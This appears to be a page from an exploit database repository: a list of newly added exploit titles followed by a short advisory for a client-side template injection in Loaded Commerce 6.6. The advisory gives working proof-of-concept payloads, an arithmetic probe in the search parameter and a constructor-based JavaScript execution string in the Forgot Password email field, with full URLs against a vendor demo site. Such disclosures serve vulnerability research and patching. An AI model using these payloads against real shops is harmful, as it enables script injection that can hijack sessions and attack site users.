04fa5ba95d
6 changes to exploits/shellcodes/ghdb Gitea 1.24.0 - HTML Injection Extensive VC Addons for WPBakery page builder 1.9.0 - Remote Code Execution (RCE) Loaded Commerce 6.6 - Client-Side Template Injection(CSTI) TranzAxis 3.2.41.10.26 - Stored Cross-Site Scripting (XSS) (Authenticated) VeeVPN 1.6.1 - Unquoted Service Path
15 lines
No EOL
743 B
Text
15 lines
No EOL
743 B
Text
# Exploit Title: Loaded Commerce 6.6 Client-Side Template Injection(CSTI)
|
|
# Date: 03/13/2025
|
|
# Exploit Author: tmrswrr
|
|
# Vendor Homepage: https://loadedcommerce.com/
|
|
# Version: 6.6
|
|
# Tested on: https://www.softaculous.com/apps/ecommerce/Loaded_Commerce
|
|
|
|
Injecting {{7*7}} into the search parameter
|
|
https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core%2Fadvanced_search_result&keywords={{7*7}}
|
|
returns 49, confirming a template injection vulnerability.
|
|
|
|
Forgot Password:
|
|
Submitting {{constructor.constructor('alert(1)')()}} in the email field on the "Forgot Password" page
|
|
https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core/password_forgotten&action=process
|
|
triggers an alert, demonstrating client-side code execution. |